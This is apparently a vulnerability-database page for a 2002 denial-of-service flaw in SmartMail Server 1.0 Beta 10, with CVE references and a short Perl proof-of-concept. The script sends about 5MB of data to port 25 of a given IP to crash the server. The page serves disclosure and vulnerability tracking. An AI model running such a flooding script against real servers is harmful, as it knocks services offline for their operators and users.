Lucene search
+L

SmartMail Server 1.0 Beta 10 - Oversized Request Denial of Service

🗓️ 31 Oct 2002 00:00:00Reported by securma massineType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

SmartMail Server 1.0 Beta 10 vulnerable to denial of service by oversize requests on ports 25 and 110.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2002-1945
28 Jun 200504:00
cve
cvelist
Cvelist
CVE-2002-1945
28 Jun 200504:00
cvelist
euvd
EUVD
EUVD-2002-1924
7 Oct 202500:30
euvd
nvd
NVD
CVE-2002-1945
31 Dec 200205:00
nvd
source: https://www.securityfocus.com/bid/6075/info

SmartMail Server is reported to be prone to a remote denial of service
condition. It is possible to trigger this condition by sending large amounts (5MB+) of data to the server via TCP port 25 or 110.

SmartMail Server will need to be restarted to regain normal functionality.

This issue was reported in SmartMail Server 1.0 BETA 10. It is not known if other versions are affected.

#!/usr/bin/perl -w
# tool smartdos.pl
# [email protected]
# Greetz: marocit and #crack.fr (specialement christal.)
#
use IO::Socket;
if ($#ARGV<0)
{
 print "\n write the target IP!\n\n";
 exit;
}
$buffer = "A"x 5099999 ;
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer";
print "\nsending exploit......\n\n";

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Oct 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.0333
35